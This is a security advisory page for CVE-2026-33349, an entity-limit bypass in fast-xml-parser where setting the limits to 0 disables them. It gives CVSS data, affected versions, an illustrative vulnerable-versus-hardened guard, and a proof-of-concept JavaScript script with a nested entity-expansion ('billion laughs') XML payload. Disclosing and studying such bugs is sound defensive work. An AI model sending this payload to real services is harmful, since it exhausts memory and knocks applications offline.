Security Vulnerability Report
CVE-2026-33349 CVSS 5.9 MEDIUM

CVE-2026-33349

Published: 2026-03-24 20:16:29
Last Modified: 2026-03-26 13:01:53

Description

fast-xml-parser allows users to process XML from JS object without C/C++ based libraries or callbacks. From version 4.0.0-beta.3 to before version 5.5.7, the DocTypeReader in fast-xml-parser uses JavaScript truthy checks to evaluate maxEntityCount and maxEntitySize configuration limits. When a developer explicitly sets either limit to 0 — intending to disallow all entities or restrict entity size to zero bytes — the falsy nature of 0 in JavaScript causes the guard conditions to short-circuit, completely bypassing the limits. An attacker who can supply XML input to such an application can trigger unbounded entity expansion, leading to memory exhaustion and denial of service. This issue has been patched in version 5.5.7.
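The guard pattern the description refers to, reduced to its essence as an added illustration (this is constructed example code, not fast-xml-parser's DocTypeReader): a truthy check on a limit silently treats an explicit 0 as "no limit", while an explicit "is this limit configured" test honours it. The `checkDoctype` scanner and its sample DTD are simplifications made for this example.

```javascript
// Constructed illustration of the CVE-2026-33349 guard bug; not the library's code.
// Entity handling is simplified: we only count <!ENTITY name "value"> declarations
// in the internal subset and check each value's length against the limits.

// Vulnerable guard: `limits.maxEntityCount && ...` short-circuits when the limit
// is 0 (falsy), so a developer's "zero entities allowed" is never enforced.
function vulnerableGuard(limits, entityCount, entitySize) {
  if (limits.maxEntityCount && entityCount > limits.maxEntityCount) {
    throw new Error('entity count limit exceeded');
  }
  if (limits.maxEntitySize && entitySize > limits.maxEntitySize) {
    throw new Error('entity size limit exceeded');
  }
  return true;
}

// Hardened guard: test whether a limit was configured at all (a finite number),
// not whether it is truthy, so 0 means "reject any entity" as intended.
function hardenedGuard(limits, entityCount, entitySize) {
  if (Number.isFinite(limits.maxEntityCount) && entityCount > limits.maxEntityCount) {
    throw new Error('entity count limit exceeded');
  }
  if (Number.isFinite(limits.maxEntitySize) && entitySize > limits.maxEntitySize) {
    throw new Error('entity size limit exceeded');
  }
  return true;
}

// Minimal declaration matcher for the internal DTD subset (hypothetical, not a full DTD parser).
const ENTITY_DECL = /<!ENTITY\s+(\w+)\s+"([^"]*)"\s*>/g;

// Apply `guard` to every declaration in order; returns the number accepted,
// throws as soon as the guard rejects one.
function checkDoctype(xml, limits, guard) {
  let count = 0;
  for (const m of xml.matchAll(ENTITY_DECL)) {
    count += 1;
    guard(limits, count, m[2].length);
  }
  return count;
}

// Constructed sample document with two small entity declarations.
const SAMPLE = '<!DOCTYPE d [<!ENTITY a "hello"><!ENTITY b "&a;&a;">]><d>&b;</d>';

// True when the guard rejects the sample under the given limits.
function rejects(guard, limits) {
  try { checkDoctype(SAMPLE, limits, guard); return false; } catch (e) { return true; }
}
```

With both limits set to 0, `rejects(vulnerableGuard, ...)` is false (the sample passes, which is the bug) while `rejects(hardenedGuard, ...)` is true.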

CVSS Details

CVSS Score
5.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
Weakness
CWE-1284 (Improper Validation of Specified Quantity in Input)

Configurations (Affected Products)

cpe:2.3:a:naturalintelligence:fast-xml-parser:*:*:*:*:*:*:*:* (>= 4.0.1, < 4.5.5) - VULNERABLE
cpe:2.3:a:naturalintelligence:fast-xml-parser:*:*:*:*:*:*:*:* (>= 5.0.0, < 5.5.7) - VULNERABLE
cpe:2.3:a:naturalintelligence:fast-xml-parser:4.0.0:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:naturalintelligence:fast-xml-parser:4.0.0:beta3:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:naturalintelligence:fast-xml-parser:4.0.0:beta4:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:naturalintelligence:fast-xml-parser:4.0.0:beta5:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:naturalintelligence:fast-xml-parser:4.0.0:beta6:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:naturalintelligence:fast-xml-parser:4.0.0:beta7:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:naturalintelligence:fast-xml-parser:4.0.0:beta8:*:*:*:*:*:* - VULNERABLE
fast-xml-parser >= 4.0.0-beta.3, < 5.5.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
const { XMLParser } = require('fast-xml-parser');

// Vulnerable configuration: setting limits to 0 to restrict entities
const options = {
  ignoreAttributes: false,
  allowBooleanAttributes: true,
  // Setting these to 0 intends to disable entities, but bypasses the check
  maxEntitySize: 0,
  maxEntityCount: 0
};
const parser = new XMLParser(options);

const xmlData = `
<!DOCTYPE data [
  <!ENTITY a "1234567890">
  <!ENTITY b "&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;">
  <!ENTITY c "&b;&b;&b;&b;&b;&b;&b;&b;&b;&b;">
  <!ENTITY d "&c;&c;&c;&c;&c;&c;&c;&c;&c;&c;">
  <!ENTITY e "&d;&d;&d;&d;&d;&d;&d;&d;&d;&d;">
  <!ENTITY f "&e;&e;&e;&e;&e;&e;&e;&e;&e;&e;">
  <!ENTITY g "&f;&f;&f;&f;&f;&f;&f;&f;&f;&f;">
  <!ENTITY h "&g;&g;&g;&g;&g;&g;&g;&g;&g;&g;">
  <!ENTITY i "&h;&h;&h;&h;&h;&h;&h;&h;&h;&h;">
]>
<data>&i;</data>
`;

try {
  // This will cause DoS due to unbounded expansion because limits are bypassed
  const result = parser.parse(xmlData);
  console.log('Parsing succeeded (unexpectedly):', result);
} catch (e) {
  console.error('Parsing failed:', e.message);
}

References

https://github.com/NaturalIntelligence/fast-xml-parser/commit/239b64aa1fc5c5455ddebbbb54a187eb68c9fdb7 (Patch)
https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-jp2q-39xq-3w4g (Exploit, Mitigation, Vendor Advisory)
